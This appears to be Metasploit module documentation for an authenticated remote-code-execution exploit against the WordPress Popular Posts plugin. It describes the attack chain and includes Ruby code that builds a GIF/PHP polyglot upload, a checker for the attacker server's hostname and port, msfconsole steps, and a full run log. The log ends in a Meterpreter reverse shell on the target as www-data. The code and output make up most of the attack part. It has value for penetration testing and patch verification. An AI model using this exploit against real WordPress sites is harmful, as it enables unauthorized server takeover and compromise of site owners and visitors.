metasploit-gs/documentation/modules/exploit/multi/http/wp_popular_posts_rce.md
2021-12-08 16:45:19 -05:00
## Vulnerable Application
This exploit leverages an authenticated improper input validation vulnerability in the WordPress plugin Popular Posts <= 5.3.2.
The exploit chain is rather complicated.
Authentication is required, and the `gd` extension for PHP must be present on the server.
First the Popular Posts plugin is reconfigured to allow an arbitrary URL for the post thumbnail shown in the widget.
A post is then created, and requests are sent to it until it has 5 more views than the current #1 post. Once
the post is in the top 5, and after the server-side cache refresh (the plugin refreshes every 60 seconds; the module waits 90),
the homepage widget is loaded, which makes the plugin download the "image" from our server. The payload carries a `GIF`
header, so it is accepted as an image, and a double extension (`.gif.php`), so the web server executes it as PHP.
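The polyglot described above, as an added Ruby example that is not part of the module or the plugin: it builds the GIF-header-plus-PHP file, shows the two checks the chain relies on (a magic-byte check that the payload passes, and the trailing `.php` extension that the web server acts on), and contrasts a name filter that lets the double extension through with a hardened one that derives the stored name from the detected content. The plugin's own validation code is not reproduced here; the check functions are illustrative stand-ins, and the sample PHP and file name are constructed.

```ruby
require 'securerandom'

# Minimal GIF89a prefix: signature plus a logical screen descriptor for a
# 1x1 canvas with no colour table (13 bytes in total).
GIF_PREFIX = ('GIF89a'.b + [1, 1, 0, 0, 0].pack('vvCCC')).freeze

# Build a file that is a valid-looking GIF to a header check and valid PHP to
# the interpreter: PHP copies the bytes before `<?php` to the response
# verbatim and executes what follows.
def build_gif_php_polyglot(php_code)
  GIF_PREFIX + "\n<?php #{php_code} ?>".b
end

# Content check of the kind an image fetcher performs (compare getimagesize()):
# it inspects the leading bytes, not the name the file will be saved under.
def gif_magic?(bytes)
  ['GIF87a'.b, 'GIF89a'.b].include?(bytes.byteslice(0, 6))
end

# On a typical Apache/PHP setup the last extension decides execution.
def php_executes?(filename)
  File.extname(filename).downcase == '.php'
end

# Illustrative name filter that only asks "does it look like an image", the
# flaw that lets a double extension through: 33pdOF.gif.php matches.
def naive_image_name?(filename)
  %w[.gif .jpg .jpeg .png].any? { |ext| filename.downcase.include?(ext) }
end

# Hardened alternative: decide the extension from the detected content and
# throw the remote file name away entirely, so nothing can end in .php.
def safe_stored_name(bytes, post_id)
  return nil unless gif_magic?(bytes)
  "#{post_id}_#{SecureRandom.hex(6)}.gif"
end

if __FILE__ == $PROGRAM_NAME
  payload = build_gif_php_polyglot('echo "hi";') # constructed sample payload
  remote_name = '33pdOF.gif.php'                 # name style used in the run below
  puts "magic bytes accepted:      #{gif_magic?(payload)}"
  puts "naive name filter passes:  #{naive_image_name?(remote_name)}"
  puts "stored as-is executes PHP: #{php_executes?("257_#{remote_name}")}"
  puts "hardened stored name:      #{safe_stored_name(payload, 257)}"
end
```

The defensive point is the last function: once the stored name is derived from the detected type and a random token, the attacker controls neither the extension nor the path, and the double-extension trick has nothing to work with.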
### Requirements
#### Server
* `gd` must be installed
* Must have a Popular Posts widget installed on the homepage
#### Client
* Authentication is required
* Authorization to create a post
* An FQDN for the Metasploit server which does NOT resolve to an address WordPress treats as local (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
* SRVPORT must be `80`, `443` or `8080`, and reachable from the target
* The listener must be able to answer both the `HEAD` and the `GET` request the target sends for the image
## Verification Steps
1. Install the plugin in WordPress
1. Start msfconsole
1. Do: `use exploits/multi/http/wp_popular_posts_rce`
1. Do: `set rhosts`
1. Do: `set username`
1. Do: `set password`
1. Do: `set SRVHOSTNAME`
1. Do: `set SRVPORT`
1. Do: `run`
1. You should get a shell.
## Options
### USERNAME
Username of the account which has post privileges. Defaults to `admin`.
### PASSWORD
Password of the account which has post privileges. Defaults to `admin`.
### SRVHOSTNAME
FQDN of the Metasploit server. Must not resolve to an address WordPress treats as local (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16); WordPress refuses to fetch from such hosts unless the site explicitly allows it via the `http_request_host_is_external` filter.
[Ref](https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560)
### SRVPORT
The local port to listen on. Must be `80`,`443`, or `8080`.
[Ref](https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584)
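As an added example that is not module code, a Ruby pre-flight that applies the same host and port rules `wp_http_validate_url()` enforces (the two references above) to a candidate SRVHOSTNAME/SRVPORT before running the module. Failing either rule means the target will silently never request the payload. The resolver is injectable so the check can run without DNS; the stub addresses below are constructed.

```ruby
require 'ipaddr'
require 'resolv'

# Ranges wp_http_validate_url() treats as local, and the only ports it will
# fetch from. Mirrored from the http.php references above; a site owner can
# relax the host rule with the http_request_host_is_external filter.
WP_LOCAL_RANGES = %w[127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16]
                  .map { |cidr| IPAddr.new(cidr) }.freeze
WP_ALLOWED_PORTS = [80, 443, 8080].freeze

# True when WordPress would refuse to fetch from this IPv4 address.
def wp_local_ip?(ip)
  addr = IPAddr.new(ip.to_s)
  WP_LOCAL_RANGES.any? { |range| range.include?(addr) }
end

def wp_port_ok?(port)
  WP_ALLOWED_PORTS.include?(Integer(port))
end

# Resolve the way the target will: a dotted-quad literal is used as-is,
# anything else is looked up; nil mirrors a failed gethostbyname().
def resolve_like_wordpress(hostname, resolver)
  return IPAddr.new(hostname).to_s if hostname =~ /\A\d{1,3}(\.\d{1,3}){3}\z/
  resolver.call(hostname)
rescue IPAddr::InvalidAddressError, Resolv::ResolvError, SocketError
  nil
end

# Pre-flight for SRVHOSTNAME/SRVPORT: returns the reasons the target's
# WordPress would never reach the payload URL (empty means the settings pass).
def srvhost_problems(hostname, port, resolver: ->(h) { Resolv.getaddress(h) })
  problems = []
  ip = resolve_like_wordpress(hostname, resolver)
  if ip.nil?
    problems << "#{hostname} does not resolve; WordPress aborts when gethostbyname() fails"
  elsif wp_local_ip?(ip)
    problems << "#{hostname} resolves to #{ip}, which WordPress treats as local and refuses"
  end
  unless wp_port_ok?(port)
    problems << "port #{port} is not one of #{WP_ALLOWED_PORTS.join('/')}"
  end
  problems
end

if __FILE__ == $PROGRAM_NAME
  # Constructed cases; the lambda stands in for real DNS so nothing leaves the box.
  lab_dns = ->(_h) { '192.168.1.5' }
  puts srvhost_problems('test.metasploit.com', 8080, resolver: lab_dns).inspect
  puts srvhost_problems('203.0.113.10', 4444).inspect
  puts srvhost_problems('203.0.113.10', 443).inspect
end
```

Run it with the hostname you intend to set as SRVHOSTNAME and the port you intend to set as SRVPORT; an empty list is the only result worth proceeding with. The host rule only matters when the name resolves on the target, so test resolution from the target's network position, not from your own.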
## Scenarios
### WordPress Popular Posts 5.3.2 on WordPress 5.4.8 running on Ubuntu 20.04
```
[*] Processing popular.rb for ERB directives.
resource (popular.rb)> use exploits/multi/http/wp_popular_posts_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (popular.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (popular.rb)> set username admin
username => admin
resource (popular.rb)> set password admin
password => admin
resource (popular.rb)> set verbose true
verbose => true
resource (popular.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (popular.rb)> set SRVHOST 1.1.1.1
SRVHOST => 1.1.1.1
resource (popular.rb)> set SRVPORT 8080
SRVPORT => 8080
resource (popular.rb)> set ReverseAllowProxy true
ReverseAllowProxy => true
resource (popular.rb)> set SRVHOSTNAME test.metasploit.com
SRVHOSTNAME => test.metasploit.com
resource (popular.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/wordpress-popular-posts/readme.txt
[*] Found version 5.3.2 in the plugin
[+] The target appears to be vulnerable.
[*] Payload file name: 33pdOF.gif.php
[*] Checking if gd is installed
[*] Determining post with most views
[*] Top Views: 25
[*] Retrieving wpp_admin token
[*] wpp_admin_token: 77de9f26d8
[*] Updating popular posts settings for images
[*] Clearing image cache
[*] Creating new post
[*] ajax nonce: 62666b5377
[*] wp nonce: 6ec79a728b
[*] Created Post: 257
[*] Writing content to Post: 257
[*] Starting web server to handle request for image payload
[*] Using URL: http://1.1.1.1:8080/33pdOF.gif.php
[*] Adding malicious metadata for redirect to http://test.metasploit.com:8080/33pdOF.gif.php
[*] Sending 30 views to http://2.2.2.2/index.php/2021/12/06/mvihjvanh2eyo2n6b43wjxj16/
[*] Waiting 90sec for cache refresh by server
[*] Attempting to force loading of shell by visiting to homepage and loading the widget
[+] Responding to initial HEAD request (passed check 1)
[+] Responding to GET request (passed check 2)
[*] Triggering shell at: /wp-content/uploads/wordpress-popular-posts/257_33pdOF.gif.php in 10 seconds. Attempt 1 of 5
[*] Sending stage (39282 bytes) to 2.2.2.2
[+] Deleted 257_33pdOF.gif.php
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:38664 ) at 2021-12-05 19:05:57 -0500
[*] Server stopped.
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : wordpress2004
OS : Linux wordpress2004 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
Meterpreter : php/linux
```